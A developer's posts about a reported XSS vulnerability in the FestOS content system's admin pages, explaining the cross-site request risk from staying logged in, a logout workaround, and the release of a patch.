A "white hat" hacking group has informed me that two of the admin pages are potentially vulnerable to XSS injection. These would be the two php scripts that save the pages you add and those you edit. While not identified, the two related snippets processor pages would also be vulnerable.

Their claim is that a user could inject XSS or other malicious code via these processor pages. However, all of the affected pages require you to be logged in as an administrator -- all are set to redirect you if you're not logged in.

Thus, to exploit this "vulnerability" you must be logged in as the site admin. In my mind, this makes the vulnerability nothing to lose sleep over. In my tests, you can't submit data to the form if you're not logged in. Furthermore, filtering the data you input would limit the current flexibility of the system -- other than the restrictions imposed by TinyMCE, you can input anything into the page/snippets so that you can add to your site as you see fit.

I'm not sure how or if I'll handle this in a future release. I sincerely appreciate the testing provided by this white-hat group. They have said they will publish their findings in a few days.

Tim

PS: I added this as an issue at the Google code site.

As noted previously, the affected administration pages require the user to be logged on with sufficient permissions. A malicious user cannot simply load the form processing page and use it to insert data. They must be logged on as an admin or the page will halt.

Thus the real risk arises when FestOS administrators do not log out before visiting other web sites. In such a situation, code at those sites could capitalize on the lingering logged on state, craft a special request to your FestOS site, and modify data (update a web page, add an administrator, etc.).

Until a fix is published, you can easily eliminate this vulnerability by logging out before leaving the site. (also, don't visit another site in another browser tab or window while remaining logged onto the FestOS admin system)

I've posted a patch for the XSS vulnerability. You can grab it from the Google code site. http://code.google.com/p/festos/downloads/list You *must* merge the contents of the "ADD 2 YOUR config.php FILE.txt" file with your config.php file (core directory). The rest, just upload over the old files.

Tim